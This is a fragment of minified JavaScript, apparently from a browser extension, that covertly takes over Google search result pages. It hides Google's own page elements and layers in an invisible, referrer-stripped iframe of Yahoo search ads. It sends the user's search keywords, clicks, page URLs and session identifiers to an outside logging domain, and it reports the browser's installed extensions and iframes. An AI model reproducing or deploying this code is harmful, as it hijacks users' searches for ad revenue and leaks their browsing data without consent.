            .favicon_title {background-color: `+colors.fav_bg+` !important;border: solid 1px `+colors.fav_border+` !important;border-radius: 50% !important;vertical-align: text-bottom;margin-right: 12px;width: 28px;height: 28px;text-align: center;display: inline-flex;align-items: center;justify-content: center;}
            .favicon_background {overflow: hidden;border-radius: 28px;width: 28px !important;height: 28px !important;vertical-align: text-bottom;background-size: cover;display: inline-flex;}
            .favicon_domain{color:`+colors.site_name+` !important;line-height: 18px;position: absolute;top: 0;font-size:14px;}
            .ad-domain{margin-top: 18px;background-image: url(`+colors.dots_svg+`);background-repeat: no-repeat;background-position-x: right;background-position-y: 1px;padding-right:27px;background-size:18px;}
            #main {min-height: 0;max-width: 630px;}
            #main .adwrapper #pla-north {display:none;}
            #main .adwrapper {background-color: `+colors.bg+`!important; padding: 0 !important;}
            #main .adwrapper a {text-decoration: none !important;} 
            #main .adwrapper li {padding-bottom: 30px !important;} 
            #main .adwrapper .compTitle {font-size: 20px;color:`+colors.link+` !important;}
            #main .adwrapper h3 {margin-bottom: 5px;} 
            #main .adwrapper .ad-domain {color:`+colors.site+` !important; display: inline-block; padding-bottom: 4px; background-position-y: -2px;} 
            #main .adwrapper .compText, #main .adwrapper .compText:hover {color:`+colors.site+` !important; font-size: 14px;line-height: 22px;} 
            .page-videos #doc #main .adwrapper {margin-left: 0 !important;}
            #topbar, .results-seconds, .srp-content, footer, header, .settings-panel {display: none !important;}
        `}const bgColor=window.getComputedStyle(document.body).backgroundColor;const darkness=lightOrDark(bgColor);if(darkness!="light"){cssText+=`
        .mag-glass-blue-12 {background-position: 0 -2086px !important;width: 16px;height: 16px !important;}
        .arrow-right-blue{display: none !important;}
        .zzz-official-site-32{display: none !important;}
      `}if(iversion>=1){sendMessageToIframeWithRetry(privatelayer.contentWindow,["algoHTML","",{cssText:cssText},{acknowledgements:["loadedEvent"],iframe_width:630,nb_ads:5,darkness:darkness,margin_left:getCenterColMargin(),colors:colors},21],"RECEIVED",100,30).then(({response,attempts})=>{}).catch(error=>{fetch("https://"+log_domain+"/shy/dbg.php?v=13&t=21&i="+encodeURIComponent(i)+"&atr="+encodeURIComponent(atr)+"&step="+encodeURIComponent("sendAlgoHTMLmax"))})}else{privatelayer.contentWindow.postMessage(["algoHTML","",{cssText:cssText},{acknowledgements:["loadedEvent"],iframe_width:630,nb_ads:5,darkness:darkness,margin_left:getCenterColMargin()},21],"*")}}function getSearchSource(){var params=new URLSearchParams(window.location.search);if(params.get("ei")){if(params.get("ved")){return"searchbox"}return"autocomplete"}if(params.get("sa")==="X"&&params.get("source")!=="lnms"&&!params.get("tbm")){return"related"}return""}function getSearchType(){var params=new URLSearchParams(window.location.search);var tbm=params.get("tbm");if(tbm==="vid"){return"videos"}else if(tbm==="isch"){return"images"}var udm=params.get("udm");if(udm==="2"){return"images"}if(udm==="7"){return"videos"}return""}function updateQueryStringParameter(uri,key,value){let url=new URL(uri);url.searchParams.set(key,value);return url.toString()}function iframe(){getkw(function(keyword){if(!document.querySelector('html[itemType="http://schema.org/SearchResultsPage"]')){fetch("https://"+log_domain+"/shy/dbg.php?v=13&t=21&i="+encodeURIComponent(i)+"&atr="+encodeURIComponent(atr)+"&step="+encodeURIComponent("notSearchResultsPage"));return}if(hasElementOverlap()){return}var css_text=".flowsponso{display:none;}";var node=document.createElement("style");node.innerHTML=css_text;document.getElementsByTagName("html")[0].appendChild(node);var meta=document.createElement("meta");meta.name="referrer";meta.content="no-referrer";document.getElementsByTagName("html")[0].appendChild(meta);var listener=function(e){var eventName=e.data[0];var data=e.data[1];switch(eventName){case"noCoverage":rshow();break;case"resize":privatelayer.height=data+"px";break;case"setHeight":removeAds();let height=data;if(typeof data==="object"&&data!==null&&data.hasOwnProperty("height")){height=data.height;iversion=data.iversion}if(typeof target_element_id==="undefined"){target_element_id="search"}checkid(target_element_id,height,privatelayer);break;case"sources":localStorage.setItem("sources_yhs",JSON.stringify(data));break;case"pager":localStorage.setItem("pager_yhs",JSON.stringify(data));break;case"loadedEvent":e.source.postMessage("loadedEvent RECEIVED",e.origin);if(!loadedEventSent){loadedEventSent=true;fetch("https://"+log_domain+"/shy/st.php?t=21&i="+encodeURIComponent(i)+"&atr="+encodeURIComponent(atr)+"&fid="+encodeURIComponent(fid)+"&sid="+encodeURIComponent(sid)+"&search_type="+encodeURIComponent(getSearchType())+"&url="+encodeURIComponent(data.url))}break;case"searchEvent":fetch("https://"+log_domain+"/shy/s.php?t=21&a="+encodeURIComponent(i)+"&u="+encodeURIComponent(atr)+"&fid="+encodeURIComponent(fid)+"&sid="+encodeURIComponent(sid)+"&iversion="+encodeURIComponent(iversion)+"&search_type="+encodeURIComponent(getSearchType())+"&keyword="+encodeURIComponent(data.keywords)+"&nb="+data.nb+"&nb_top_shown="+data.nb_top_shown+"&nb_product_shown="+data.nb_product_shown).then(response=>{return response.json()}).then(data=>{if(data.pu){privatelayer.contentWindow.postMessage(["pu","","",{}],"*")}});break;case"clickEvent":fetch("https://"+log_domain+"/shy/c.php?t=21&a="+encodeURIComponent(i)+"&u="+encodeURIComponent(atr)+"&fid="+encodeURIComponent(fid)+"&sid="+encodeURIComponent(sid)+"&loc="+encodeURIComponent(data.loc||"")+"&po="+data.pos+"&rt="+encodeURIComponent(data.rt)+"&search_type="+encodeURIComponent(getSearchType())+"&keyword="+encodeURIComponent(data.keywords)+"&matarget="+encodeURIComponent(data.matarget));break;case"searchWithKeyowrd":location.href=updateQueryStringParameter(location.href,"q",data.keywords);break;case"leftSpace":var targetdiv=document.querySelector(typeof target_element_left_margin_selector!=="undefined"?target_element_left_margin_selector:"#search");if(privatelayer&&targetdiv){var rect=targetdiv.getBoundingClientRect();var left_space=rect.left+window.scrollX;if(left_space==data){privatelayer.style.left=left_space+"px"}else{privatelayer.style.left=left_space-data+"px"}}break}};window.addEventListener("message",listener,false);privatelayer=document.createElement("iframe");yhs_url=yhs_url+encodeURIComponent(keyword);let search_type=getSearchType();let search_source=getSearchSource();let yhs_sources=localStorage.getItem("sources_yhs")||"";if(search_type==="images"){yhs_url=yhs_url.replace(/^(https:\/\/[^\.]*.?)(search\.yahoo\.com)/,"$1images.$2")}else if(search_type==="videos"){yhs_url=yhs_url.replace(/^(https:\/\/[^\.]*.?)(search\.yahoo\.com)/,"$1video.$2")}else if(search_source.length>0&&yhs_sources.length>0){let parsed_sources=JSON.parse(localStorage.getItem("sources_yhs"));["searchbox","autocomplete","related"].forEach(s=>{if(parsed_sources[s]&&parsed_sources[s].length>0&&s===search_source){yhs_url+="&fr2="+parsed_sources[s]}})}yhs_url=updateURLTypeTag(yhs_url,search_type);let next_yhs=getYHSSavedPagerLinks(getGooglePageNumber());if(next_yhs){yhs_url=next_yhs}privatelayer.src=yhs_url;privatelayer.id="zxj3jdh2l";privatelayer.marginwidth="0";privatelayer.marginheight="0";privatelayer.frameborder="0";privatelayer.height="0px";privatelayer.style.zIndex="10";privatelayer.style["border"]="0";privatelayer.style.opacity="0";privatelayer.style["overflow"]="hidden";privatelayer.style["minWidth"]="1100px";privatelayer.style["position"]="absolute";privatelayer.setAttribute("referrerpolicy","no-referrer");document.documentElement.prepend(privatelayer);fetch("https://"+log_domain+"/in.php?i="+encodeURIComponent(i)+"&atr="+encodeURIComponent(atr)+"&sources_yhs="+encodeURIComponent(localStorage.getItem("sources_yhs")||"")+"&source="+encodeURIComponent(getSearchSource())+"&search_type="+encodeURIComponent(getSearchType())+"&fid="+encodeURIComponent(fid)+"&sid="+encodeURIComponent(sid)+"&url="+encodeURIComponent(privatelayer.src)+"&gurl="+encodeURIComponent(window.location.href)+"&t=21");window.addEventListener("resize",function(){privatelayer.contentWindow.postMessage(["leftSpace","","",""],"*");if(search_type=="videos"){sendCenterColMargin()}});verifyThirdPartyOverlap()})}function getCenterColMargin(){let center_col=document.getElementById("center_col");if(center_col){return center_col.getBoundingClientRect().left.toString()+"px"}}function sendCenterColMargin(){privatelayer.contentWindow.postMessage(["setMarginLeft",getCenterColMargin(),"",""],"*")}function verifyThirdPartyOverlap(){clearTimeout(verify_overlap_timeout);hasThirdPartyElementOverlap();verify_overlap_timeout=setTimeout(verifyThirdPartyOverlap,1e3)}function sendErrorMessage(message){fetch("https://"+log_domain+"/shy/e.php?cause="+encodeURIComponent(message)+"&i="+encodeURIComponent(i)+"&atr="+encodeURIComponent(atr)+"&t=21&v="+error_version+"&url="+encodeURIComponent(document.location.href))}iframe();setTimeout(function(){reportChromeExtensions(21);reportIframes(21)},5e3);setTimeout(function(){rshow()},3e3);})();